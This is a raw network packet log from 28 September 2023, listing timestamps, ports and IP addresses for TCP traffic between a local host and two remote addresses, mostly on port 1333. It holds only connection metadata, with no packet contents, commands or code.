Sep 28, 2023 06:01:59.891344070 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.891396999 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.891437054 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.891475916 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.891489983 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.891518116 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.891529083 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.891541004 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.891554117 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.891567945 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.891592026 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.891596079 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.891634941 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.891729116 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.891741991 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.891768932 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.891783953 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.891836882 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.891876936 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.891902924 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.891942978 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.891968012 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.892008066 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.892034054 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.892074108 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.892076969 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.892116070 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.892142057 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.892179966 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.892239094 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.892280102 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.892283916 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.892323017 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.892395973 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.892443895 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.892443895 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.892482996 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.892508984 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.892549992 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.892571926 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.892611027 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.892631054 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.892669916 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.892705917 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.892719984 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.892746925 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.892761946 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.892796040 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.892826080 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.892836094 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.892865896 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.892891884 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.892930031 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.892956018 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.892997026 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.893023014 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.893064022 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.893080950 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.893135071 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.893153906 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.893172979 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.893218040 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.893260002 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.893285990 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.893328905 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.893354893 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.893394947 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.893420935 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.893461943 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.893488884 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.893501997 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.893515110 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.893527031 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.893527985 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.893547058 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.893564939 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.893580914 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.893623114 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.893644094 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.893699884 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.893723011 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.893738031 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.893739939 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.893780947 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.893802881 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.893842936 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.893860102 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.893899918 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.893938065 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.893978119 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.894013882 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.894028902 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.894056082 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.894083977 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.894107103 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.894148111 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.894150019 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.894190073 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.894202948 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.894242048 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.894268036 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.894305944 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.894326925 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.894365072 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.894392014 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.894435883 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.894445896 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.894459963 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.894481897 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.894511938 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.894536972 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.894562006 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.894577026 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.894599915 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.894624949 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.894665003 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.894690990 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.894727945 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.894743919 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.894782066 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.894790888 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.894829035 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.894867897 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.894908905 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.894918919 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.894956112 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.894988060 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.895025969 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.021200895 CEST	80	49814	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:00.021488905 CEST	49814	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:00.032577991 CEST	80	49816	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:00.032699108 CEST	49816	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:00.032932043 CEST	49816	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:00.063575029 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.063685894 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.063996077 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.064039946 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.064096928 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.064131975 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.064173937 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.064188004 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.064188004 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.064188957 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.064209938 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.064229965 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.064229965 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.064249039 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.064259052 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.064285040 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.064305067 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.064323902 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.064342022 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.064363956 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.064378023 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.064402103 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.064412117 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.064439058 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.064451933 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.064476013 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.064490080 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.064513922 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.064527035 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.064553976 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.064565897 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.064593077 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.064610004 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.064630985 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.064646959 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.064682961 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.064826965 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.064863920 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.064882040 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.064907074 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.064915895 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.064959049 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.065009117 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.065048933 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.065063000 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.065087080 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.065099001 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.065136909 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.065218925 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.065257072 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.065269947 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.065294027 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.065305948 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.065356970 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.065426111 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.065464973 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.065489054 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.065500975 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.065517902 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.065555096 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.066138983 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.066176891 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.066204071 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.066215038 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.066221952 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.066252947 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.066262960 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.066304922 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.066323042 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.066359997 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.066374063 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.066400051 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.066411972 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.066457033 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.066461086 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.066494942 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.066510916 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.066531897 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.066546917 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.066569090 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.066581011 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.066610098 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.066622019 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.066663980 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.066951990 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.067013025 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.067020893 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.067060947 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.067073107 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.067110062 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.067209959 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.067249060 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.067270994 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.067286968 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.067306995 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.067336082 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.067361116 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.067397118 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.067413092 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.067435026 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.067444086 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.067502022 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.067612886 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.067651033 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.067676067 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.067687988 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.067698956 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.067743063 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.067759037 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.067809105 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.067888021 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.067924976 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.067949057 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.067962885 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.067967892 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.068013906 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.068032026 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.068068981 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.068084002 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.068106890 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.068120003 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.068144083 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.068157911 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.068181038 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.068195105 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.068237066 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.068627119 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.068666935 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.068686962 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.068705082 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.068710089 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.068743944 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.068753004 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.068788052 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.068981886 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.069020987 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.069039106 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.069057941 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.069070101 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.069094896 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.069099903 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.069142103 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.069166899 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.069211006 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.069235086 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.069272995 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.069281101 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.069315910 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.069341898 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.069377899 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.069386005 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.069421053 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.069449902 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.069487095 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.069494963 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.069523096 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.069529057 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.069566011 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.069681883 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.069717884 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.069736958 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.069756031 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.069766045 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.069801092 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.069801092 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.069847107 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.069901943 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.069941998 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.069950104 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.069984913 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.070010900 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.070046902 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.070054054 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.070094109 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.070306063 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.070360899 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.070378065 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.070422888 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.070451975 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.070472956 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.070478916 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.070522070 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.070558071 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.070599079 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.070636988 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.070651054 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.070664883 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.070682049 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.070710897 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.071072102 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.071084976 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.071116924 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.071145058 CEST	49810	1333	192.168.2.3	116.202.2.169
